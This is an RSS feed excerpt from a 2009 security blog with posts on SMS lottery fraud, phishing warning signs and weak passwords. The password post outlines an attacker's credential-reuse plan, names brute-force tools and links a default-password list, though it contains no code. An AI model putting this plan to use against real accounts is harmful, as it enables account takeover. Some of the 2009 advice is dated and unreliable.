<p><span>He mailed again to the said sender. The sender sent him proof of winning and asked to contact a so-called lawyer to get FRO. On sending e-mail to the said lawyer, the said lawyer asked him to send <span>Rs</span>. 33,000. For the details of Manish Complaint, visit<a href="http://www.complaintsboard.com/complaints/o2-telecom-c177205.html" target="_blank"><span>http://www.complaintsboard.com/complaints/o2-telecom-c177205.html</span></a>.</span></p>
<p><span> </span></p>
<p><span>“People should be <span>beware</span> of these SMS frauds and should not respond to these at all”, said<span>Shashin</span> <span>Lotlikar</span>, Chairman of Cyber Security firm ISAAC at Mumbai. <span>Anjay</span> <span>Agarwal</span>, CMD of AAA Consulting hold the same views and warned “The best way to deal these frauds is just delete the SMS message”.</span></p>
<p><span> </span></p>
<p><span>“Nobody give you free money. Fraudsters devise newer methods to attract your attention by playing with human psychology and greed. People should just think straight &#8211; why any person is offering you the lottery money, when he does not know even your name and you have not purchased any ticket?”, said Rakesh Goyal, Director-General of CRPCC and MD of Sysman Computers, a Mumbai based IT Security Company. </span><span>“+44-70xx are </span><em><span>Personal numbering</span></em><span> in the</span><em><span>Find me anywhere</span></em><span> range in UK. Charges for calls to these numbers are not distance-dependent. They can cost as much as INR 45 (GBP 0.50) per minute to call and can forward the call to virtually any phone number in the world. Forwarding numbers can be set up for free and completely anonymously via websites such as </span><strong><span><a href="http://uknumbers.com/" target="_blank">uknumbers.com</a></span></strong><span>. Thus, these numbers are used by 419 fraudsters, mostly based in Nigeria and nearby West-African countries, giving these countries a bad name. Further, why a genuine organization use e-mails like @<a href="http://live.com/" target="_blank">live.com</a>or @<a href="http://yahoo.com/" target="_blank">yahoo.com</a>, or a similar e-mail provider”, said Rakesh Goyal</span></p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/03/30/beware-new-wave-of-sms-phishing/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>How to Avoid Becoming a Victim of a Phishing Scam</title>
		<link>http://techblog.cyberphunkz.com/2009/03/27/how-to-avoid-becoming-a-victim-of-a-phishing-scam/</link>
		<comments>http://techblog.cyberphunkz.com/2009/03/27/how-to-avoid-becoming-a-victim-of-a-phishing-scam/#comments</comments>
		<pubDate>Fri, 27 Mar 2009 14:15:30 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[scams]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=42</guid>
		<description><![CDATA[If you receive any unsolicited email from a bank or other institution that asks you to click an included hyperlink and provide sensitive personal information, then you should view the message with the utmost suspicion. If you have any doubts at all about the veracity of the email, contact the institution directly to check. Never &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/03/27/how-to-avoid-becoming-a-victim-of-a-phishing-scam/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<ul class="tabletext">
<li>If you receive any unsolicited email from a bank or other institution that asks you to click an included hyperlink and provide sensitive personal information, then you should view the message with the utmost suspicion. If you have any doubts at all about the veracity of the email, contact the institution directly to check.</li>
<li>Never click on a link in an email in order to access the website of a bank or other institutions that may be the target of scammers. The safest method is to manually enter the URL of the institution&#8217;s website into your browser&#8217;s address bar.</li>
<li>If you supply sensitive information on a website, always ensure that the site is secure. The address of the page should start with &#8220;https://&#8221; not just &#8220;http://&#8221; and the Lock icon should be displayed in the browser&#8217;s status bar. If these indicators are not present, it means that the site is not secure and information you enter on the site is not protected. Fraudulent web forms related to phishing scams are often non-secure sites. Please note, however, that even an apparently secure site may be fraudulent. The fact that a site appears to be secure is not by itself a guarantee that the site is legitimate. However, legitimate sites that require users to supply personal information will <em>always</em> be secure.</li>
<li>Use firewall, anti-virus and anti-spyware software to protect your computer system. Some phishing scam emails may carry trojans or other malware that may compromise your system.</li>
<li>Ensure that your browser, system software and other applications have the latest security updates available. This will reduce the risk of scammers accessing your system via unpatched software vulnerabilities.</li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/03/27/how-to-avoid-becoming-a-victim-of-a-phishing-scam/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Common Characteristics of Phishing Scam Emails</title>
		<link>http://techblog.cyberphunkz.com/2009/03/27/common-characteristics-of-phishing-scam-emails/</link>
		<comments>http://techblog.cyberphunkz.com/2009/03/27/common-characteristics-of-phishing-scam-emails/#comments</comments>
		<pubDate>Fri, 27 Mar 2009 14:14:44 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[scams]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=40</guid>
		<description><![CDATA[Unsolicited requests for sensitive information The entire purpose of a typical phishing scam email is to get the recipient to provide personal information. If you receive any unsolicited email ostensibly from a bank or other institution that asks you to click a link and provide sensitive personal information, then you should view the message with &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/03/27/common-characteristics-of-phishing-scam-emails/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<ul class="tabletext">
<li><strong>Unsolicited requests for sensitive information</strong><br />
The entire purpose of a typical phishing scam email is to get the recipient to provide personal information. If you receive any unsolicited email ostensibly from a bank or other institution that asks you to click a link and provide sensitive personal information, then you should view the message with the utmost suspicion. It is highly unlikely that a legitimate institution would request sensitive information in such a way. </li>
<li><strong>Content appears genuine</strong><br />
Phishing scam emails are created to give the illusion that they have been sent by a legitimate institution. The email may arrive in HTML format and include logos, styling, contact and copyright information virtually identical to those used by the targeted institution. To further create the illusion of legitimacy, some of the secondary links in these bogus emails may lead to the institution&#8217;s genuine website. However, one or more of the hyperlinks featured in the body of the email will point to the fraudulent website.</li>
<li><strong>Disguised hyperlinks and sender address</strong><br />
Links in phishing scam emails are often disguised to make it appear that they lead to the genuine institution site. The sender address of the email may also be disguised in such a way that it appears to have originated from the targeted company.</li>
<li><strong>Email consists of a clickable image</strong><br />
Some phishing scam emails may arrive as a clickable image file. That is, the entire email consists of an image that contains the fraudulent request for information. These are a particularly dangerous type because clicking anywhere within the email will cause the bogus website to open.</li>
<li><strong>Generic Greetings</strong> <br />
Because they are sent in bulk to many recipients, scam emails use generic greetings such as &#8220;Dear account holder&#8221; or &#8220;Dear [targeted institution] customer&#8221;. If an institution needed to contact a customer about some aspect of his or her account, the contact email would most likely address the customer by name.</li>
<li><strong>Use various ruses to entice recipients to click</strong><br />
Phishing scam emails use a variety of ruses to explain why it is necessary for recipients to provide the requested information. Often, the messages imply that urgent action on the part of the recipient is required. Some of the most common ruses are listed below. The scam emails may claim that:</p>
<ul>
<li>The customer&#8217;s account details need to be updated due to a software or security upgrade.</li>
<li>The customer&#8217;s account may be terminated if account details are not provided within a specified time frame.</li>
<li>Suspect or fraudulent activity involving the user&#8217;s account has been detected and the user must therefore provide information urgently.</li>
<li>Routine or random security procedures require that the user verify his or her account by providing the requested information.</li>
</ul>
</li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/03/27/common-characteristics-of-phishing-scam-emails/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How Phishing Scams Work</title>
		<link>http://techblog.cyberphunkz.com/2009/03/27/how-phishing-scams-work/</link>
		<comments>http://techblog.cyberphunkz.com/2009/03/27/how-phishing-scams-work/#comments</comments>
		<pubDate>Fri, 27 Mar 2009 14:13:13 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[scams]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=38</guid>
		<description><![CDATA[Phishing scams attempt to trick people into providing sensitive personal information such as credit card or banking details. In order to carry out this trick, the phishing scammers send a fraudulent email disguised as an official request for information from the targeted company. Generally, they also create a look-a-like website that is designed to closely &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/03/27/how-phishing-scams-work/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>Phishing scams attempt to trick people into providing sensitive personal information such as credit card or banking details. In order to carry out this trick, the phishing scammers send a fraudulent email disguised as an official request for information from the targeted company. Generally, they also create a look-a-like website that is designed to closely resemble the target company&#8217;s official site. The fake website may appear almost identical to the official site. Style, logos, images, navigation menus and other structural components may look the same as they do on the genuine website.</p>
<p>Recipients of the scam email are requested to click on an included hyperlink.  Once at this fake website, the user may be presented with a web form that requests private information such as credit card and banking details, and other account data such as a home address and phone number. Often, the visitor is requested to login using his or her username and password. All information entered into this fake website, including login details, can subsequently be collected and used at will by the criminals operating the scam.</p>
<p>A variation of the scam involves using an embedded form within the bogus email itself. Victims are instructed to enter details such as a password and bank account number into the form provided and return the email to the sender. Another variation attempts to trick recipients into installing a trojan on their computer, either by opening an email attachment or downloading the trojan from a website. The scammers can then use the trojan to collect information from the infected computer. The scam emails are randomly mass-mailed to many thousands of Internet users in the hope of netting just a small number of victims. The majority of people who receive these scam emails will probably not even be customers of the targeted institution. However, the scammers rely on the statistical probability that at least a few recipients will:</p>
<p>1.	Have accounts with the targeted institution.<br />
2.	Will be unaware of such scams and believe the email to be a legitimate request.</p>
<p>The scam can prove to be a lucrative exercise for the scammers even if only a very small percentage of recipients ultimately become victims.</p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/03/27/how-phishing-scams-work/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How I’d Hack Your Weak Passwords</title>
		<link>http://techblog.cyberphunkz.com/2009/03/26/how-i%e2%80%99d-hack-your-weak-passwords/</link>
		<comments>http://techblog.cyberphunkz.com/2009/03/26/how-i%e2%80%99d-hack-your-weak-passwords/#comments</comments>
		<pubDate>Thu, 26 Mar 2009 10:23:35 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[hacking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[password]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=28</guid>
		<description><![CDATA[If you invited me to try and crack your password, you know the one that you use over and over for like every web page you visit, how many guesses would it take before I got it? Let’s see… here is my top 10 list. I can obtain most of this information much easier than you think, &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/03/26/how-i%e2%80%99d-hack-your-weak-passwords/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>If you invited me to try and <a href="http://en.wikipedia.org/wiki/Password_cracking">crack your password</a>, you know the one that you use over and over for like every web page you visit, how many guesses would it take before I got it?</p>
<p>Let’s see… here is my top 10 list. I can obtain most of this information much easier than you think, then I might just be able to get into your e-mail, computer, or online banking. After all, if I get into one I’ll probably get into all of them.</p>
<ol>
<li>Your partner, child, or pet’s name, possibly followed by a 0 or 1 (because they’re always making you use a number, aren’t they?)</li>
<li>The last 4 digits of your driving licence number.</li>
<li>123 or 1234 or 123456.</li>
<li>“password”</li>
<li>Your city, or college, football team name.</li>
<li>Date of birth &#8211; yours, your partner’s or your child’s.</li>
<li>“god”</li>
<li>“letmein”</li>
<li>“money”</li>
<li>“love”</li>
</ol>
<p>Statistically speaking that should probably cover about 20% of you. But don’t worry. If I didn’t get it yet it will probably only take a few more minutes before I do…</p>
<p>Hackers, and I’m not talking about the ethical kind, have developed a whole range of tools to get at your personal data. And the main impediment standing between your information remaining safe, or leaking out, <strong>is the password you choose</strong>. (Ironically, the best protection people have is usually the one they take least seriously.)</p>
<p>One of the simplest ways to gain access to your information is through the use of a <a href="http://onemansblog.com/2006/10/02/investigate-yourself-for-free/">Brute Force Attack</a>. This is accomplished when a hacker uses a specially written piece of software to attempt to log into a site using your credentials. <a href="http://insecure.org/">Insecure.org</a> has a list of the Top 10 FREE Password Crackers <a href="http://sectools.org/crackers.html">right here</a>.</p>
<p>So, how would one use this process to actually breach your personal security? Simple. Follow my logic:</p>
<ul>
<li>You probably use the same password for lots of stuff right?</li>
<li>Some sites you access such as your Bank or work VPN probably have pretty decent security, so I’m not going to attack them.</li>
<li>However, other sites like the Hallmark e-mail greeting cards site, an <a href="http://forums.htmlhelp.com/">online forum</a> you frequent, or an e-commerce site you’ve shopped at might not be as well prepared. So those are the ones I’d work on.</li>
<li>So, all we have to do now is unleash <a href="http://www.hoobie.net/brutus/">Brutus</a>, <a href="http://www.darknet.org.uk/2006/12/wwwhack-19-download-wwwhack19zip-web-hacking-tool/">wwwhack</a>, or <a href="http://www.thc.org/thc-hydra/">THC Hydra</a> on their server with instructions to try say 10,000 (or 100,000 &#8211; whatever makes you happy) different usernames and passwords as fast as possible.</li>
<li>Once we’ve got several login+password pairings we can then go back and test them on targeted sites.</li>
<li>But wait… How do I know which bank you use and what your login ID is for the sites you frequent? All those cookies are simply stored, unencrypted and nicely named, in your Web browser’s cache. </li>
</ul>
<p>And how fast <a href="http://geodsoft.com/howto/password/cracking_passwords.htm">could this be done</a>? Well, that depends on three main things, the length and complexity of your password, the speed of the hacker’s computer, and the speed of the hacker’s Internet connection.</p>
<p>Assuming the hacker has a reasonably fast connection and PC here is an estimate of the amount of time it would take to generate every possible combination of passwords for a given number of characters. After generating the list it’s just a matter of time before the computer runs through all the possibilities &#8211; or gets shut down trying.</p>
<p>Pay particular attention to the difference between using only lowercase characters and using all possible characters (uppercase, lowercase, and special characters &#8211; like @#$%^&amp;*). Adding just one capital letter and one asterisk would change the processing time for an 8 character password from 2.4 days to 2.1 centuries.</p>
<table border="1" align="center">
<tbody>
<tr align="center">
<th>Password Length</th>
<th>All Characters</th>
<th>Only Lowercase</th>
</tr>
<tr align="center">
<td>3 characters<br />
4 characters<br />
5 characters<br />
6 characters<br />
7 characters<br />
8 characters<br />
9 characters<br />
10 characters<br />
11 characters<br />
12 characters<br />
13 characters<br />
14 characters</td>
<td>0.86 seconds<br />
1.36 minutes<br />
2.15 hours<br />
8.51 days<br />
2.21 years<br />
2.10 centuries<br />
20 millennia<br />
1,899 millennia<br />
180,365 millennia<br />
17,184,705 millennia<br />
1,627,797,068 millennia<br />
154,640,721,434 millennia</td>
<td>0.02 seconds<br />
.046 seconds<br />
11.9 seconds<br />
5.15 minutes<br />
2.23 hours<br />
2.42 days<br />
2.07 months<br />
4.48 years<br />
1.16 centuries<br />
3.03 millennia<br />
78.7 millennia<br />
2,046 millennia</td>
</tr>
</tbody>
</table>
<p>Remember, these are just for an average computer, and these assume you aren’t using <em>any word in the dictionary</em>. If Google put their computer to work on it they’d finish about 1,000 times faster.</p>
<p>Now, I could go on for hours and hours more about all sorts of ways to compromise your security and generally make your life miserable &#8211; but 95% of those methods begin with <em>compromising your weak password</em>. So, why not just protect yourself from the start and sleep better at night?</p>
<p>Believe me, I understand the need to choose passwords that are memorable. But if you’re going to do that how about using something that no one is ever going to guess AND doesn’t contain any common word or phrase in it.</p>
<p>Here are some password tips:</p>
<ol>
<li>Randomly substitute numbers for letters that look similar. The letter ‘o’ becomes the number ‘0?, or even better an ‘@’ or ‘*’. (i.e. &#8211; m0d3ltf0rd… like modelTford)</li>
<li>Randomly throw in capital letters (i.e. &#8211; Mod3lTF0rd)</li>
<li>Think of something you were attached to when you were younger, but DON’T CHOOSE A PERSON’S NAME! Every name plus every word in the dictionary will fail under a simple brute force attack.</li>
<li>Maybe a place you loved, or a specific car, an attraction from a vacation, or a favorite restaurant?</li>
<li>You really need to have different username / password combinations for everything. Remember, the technique is to break into anything you access just to figure out your standard password, then compromise everything else. This doesn’t work if you don’t use the same password everywhere.</li>
<li>Since it can be difficult to remember a ton of passwords, I recommend using <a href="http://www.roboform.com/php/land.php?affid=onema">Roboform</a>. It will store all of your passwords in an encrypted format and allow you to use just one master password to access all of them. It will also automatically fill in forms on Web pages, and you can even get versions that allow you to take your password list with you on your PDA, phone or a USB key. If you’d like to download it without having to navigate their web site here is the <a href="http://www.roboform.com/dist/affs/AiRoboForm-onema.exe">direct download link</a>.</li>
<li>Once you’ve thought of a password, try Microsoft’s <a href="https://www.microsoft.com/athome/security/privacy/password_checker.mspx">password strength tester</a> to find out how secure it is.</li>
</ol>
<p><span style="color: #ff0000;"><br />
</span></p>
<p>Another thing to keep in mind is that some of the passwords you think matter least <strong>actually matter most</strong>. For example, some people think that the password to their e-mail box isn’t important because “I don’t get anything sensitive there.” Well, that e-mail box is probably connected to your online banking account. If I can compromise it then I can log into the Bank’s Web site and tell it I’ve forgotten my password to have it e-mailed to me. Now, what were you saying about it not being important?</p>
<p>Often times people also reason that all of their passwords and logins are stored on their computer at home, which is save behind a router or firewall device. Of course, they’ve never bothered to change the default password on that device, so someone could drive up and park near the house, use a laptop to breach the wireless network and then try passwords from <a href="http://www.phenoelit.de/dpl/dpl.html">this list</a> until they gain control of your network &#8211; after which time they will own you!</p>
<p>Now I realize that every day we encounter people who over-exaggerate points in order to move us to action, but trust me this is not one of those times. There are 50 other ways you can be compromised and punished for using weak passwords that I haven’t even mentioned.</p>
<p>I also realize that most people just don’t care about all this until it’s too late and they’ve learned a very hard lesson. But why don’t you do me, and yourself, a favor and take a little action to strengthen your passwords and let me know that all the time I spent on this article wasn’t completely in vain.</p>
<p>Please, be safe. As Adrian Monk says, It’s a jungle out there.</p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/03/26/how-i%e2%80%99d-hack-your-weak-passwords/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

